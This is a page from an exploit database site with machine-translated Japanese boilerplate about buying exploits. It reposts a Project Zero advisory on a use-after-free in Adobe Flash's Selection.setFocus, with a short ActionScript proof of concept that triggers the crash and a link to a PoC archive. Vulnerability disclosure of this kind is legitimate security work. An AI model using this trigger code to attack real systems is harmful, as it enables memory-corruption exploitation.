0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Adobe Flash - Selection.setFocus Use-After-Free
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=841 There is a user-after-free in Selection.setFocus. It is a static method, but if it is called with a this object, it will be called on that object's thread. Then, if it calls into script, for example, by calling toString on the string parameter, the object, and its thread will be deleted, and a use-after-free occurs. A minimal PoC follows: var mc = this.createEmptyMovieClip( "mc", 1); var f = Selection.setFocus; mc.f = f; mc.f({toString : func}); function func(){ mc.removeMovieClip(); // Fix heap here } A sample SWF and fla are attached. This PoC crashes in Chrome on 64-bit Linux Proof of Concept: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40307.zip # 0day.today [2024-07-02] #